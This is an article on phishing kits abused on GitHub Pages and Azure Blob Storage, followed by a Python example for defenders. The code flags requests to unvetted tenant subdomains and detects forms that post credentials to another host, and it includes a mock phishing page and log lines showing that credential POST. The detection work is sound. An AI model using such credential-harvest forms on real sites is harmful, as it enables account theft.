
Malware Actors Abuse GitHub Platform to Store Phishing Kits

Cybercriminals have for years hosted malicious kits on well-known consumer platforms such as Facebook, Dropbox, PayPal, eBay and Google Drive. Serving content from these domains helps the operators slip past allowlists and reputation-based network filtering: their traffic blends in with legitimate use of the same services, so it reaches targets with little friction.

In April 2019, researchers reported that, since at least mid-2017, malicious actors had also been abusing the popular GitHub code hosting platform to store phishing kits, serving them from the $github_username.github.io domain (GitHub Pages). Because the phishers used free, public repositories, researchers could observe and analyze every change they committed. The crooks customized the kits for each campaign: indicators of compromise such as shortened links were updated, and landing pages were modified to work around GitHub's limitations by pointing to a PHP script hosted on a remote domain rather than one bundled with the kit.

One of these kits lured users via spam emails to landing pages hosted on GitHub and was built to steal credentials from customers of a retail bank. The credentials and other sensitive data harvested by the kits were then sent on to other compromised servers, controlled by the same people who owned the corresponding GitHub accounts. Because github.io serves only static content and offers no PHP back end, the kits stored on the platform contained no PHP components; the server-side pieces had to live elsewhere.

Researchers noted that GitHub was extremely responsive in addressing the abuse, and all the accounts found to be involved in the phishing campaigns have since been taken down.

GitHub is not an isolated case. In February 2019, another phishing tool, disguised as Google Translate on mobile devices, attempted to steal Facebook and Google login details. Microsoft's Azure Blob Storage has been misused in the same way: attackers hosted landing pages on a windows.net subdomain to steal Office 365, Outlook, Azure AD and Microsoft account credentials. Because such pages are served over HTTPS with a valid Microsoft-issued certificate for the windows.net domain, they look legitimate to anyone who checks the padlock or the certificate.
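Two checks a defender can run against the pattern described in the GitHub Pages and Azure Blob passages above, as an added example that is not part of the original article or of any researcher's tooling. The first treats the tenant-controlled subdomain (user.github.io, account.blob.core.windows.net) rather than the parent domain as the unit of trust, so a blanket allowlist entry for github.io or windows.net does not wave every tenant through. The second inspects an HTML page served from a static host and reports forms that submit to a different host, which is the tell-tale of a kit whose PHP harvester had to be moved off the static platform. The platform suffix list, the allowlist, the proxy log format, the sample log lines and the sample HTML are all constructed for this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosting platforms whose subdomains are created by arbitrary tenants.
# Assumed list for this example; extend to match your environment.
TENANT_HOSTING_SUFFIXES = {
    "github.io": "GitHub Pages",
    "blob.core.windows.net": "Azure Blob Storage",
    "web.core.windows.net": "Azure Static Websites",
    "s3.amazonaws.com": "Amazon S3 (virtual-hosted)",
    "firebaseapp.com": "Firebase Hosting",
}

# Tenant hosts that have been explicitly vetted (assumed for the example).
# Anything else on a tenant platform gets "review", never a blanket pass.
KNOWN_GOOD_HOSTS = {"docs.github.io", "ourcompany.github.io"}


def classify_host(url):
    """Return (verdict, platform, host) with verdict in trusted/review/other."""
    host = (urlparse(url).hostname or "").lower()
    for suffix, platform in TENANT_HOSTING_SUFFIXES.items():
        if host.endswith("." + suffix):
            if host in KNOWN_GOOD_HOSTS:
                return "trusted", platform, host
            return "review", platform, host
    return "other", None, host


# Constructed proxy log format: timestamp client method url status
LOG_LINE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$"
)


def flag_log_lines(lines):
    """Return (host, platform, client) for requests to unvetted tenant hosts."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue  # skip lines that do not match the assumed format
        verdict, platform, host = classify_host(m["url"])
        if verdict == "review":
            hits.append((host, platform, m["src"]))
    return hits


class _FormCollector(HTMLParser):
    """Collect the action attribute of every <form> in a page."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            action = dict(attrs).get("action")
            if action:
                self.actions.append(action)


def find_external_form_posts(page_url, html):
    """Return form actions that submit to a host other than the page's own.

    A static host cannot run PHP, so a credential form hosted there must
    post somewhere else; that cross-host submit is what we report.
    """
    page_host = (urlparse(page_url).hostname or "").lower()
    collector = _FormCollector()
    collector.feed(html)
    external = []
    for action in collector.actions:
        target = urlparse(action)
        if target.scheme in ("http", "https") and target.hostname \
                and target.hostname.lower() != page_host:
            external.append(action)
    return external


# Constructed sample data (not real logs or a real kit).
SAMPLE_LOG = [
    "2019-04-10T08:12:03Z 10.0.0.5 GET https://ourcompany.github.io/handbook/ 200",
    "2019-04-10T08:13:41Z 10.0.0.7 GET https://acct-verify-2019.github.io/login/index.html 200",
    "2019-04-10T08:14:02Z 10.0.0.7 POST https://formhandler.example.net/auth/verify.php 302",
    "2019-04-10T08:15:10Z 10.0.0.9 GET https://mailnotice.blob.core.windows.net/$web/office.html 200",
    "2019-04-10T08:16:00Z 10.0.0.9 GET https://www.example.com/ 200",
]

SAMPLE_HTML = """<html><body>
<form method="post" action="https://formhandler.example.net/auth/verify.php">
  <input name="user"><input name="pass" type="password">
</form>
<form method="get" action="/search"></form>
</body></html>"""

if __name__ == "__main__":
    for host, platform, src in flag_log_lines(SAMPLE_LOG):
        print(f"review: {src} -> {host} ({platform})")
    page = "https://acct-verify-2019.github.io/login/index.html"
    for action in find_external_form_posts(page, SAMPLE_HTML):
        print(f"cross-host form submit from {page}: {action}")
```

The log check is deliberately conservative: it does not call a tenant host malicious, only "review", because most *.github.io sites are benign. The useful signal comes from pairing it with the form check on the fetched page, or with the next request from the same client in the log (here the POST to a .php endpoint on an unrelated host a few seconds later).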
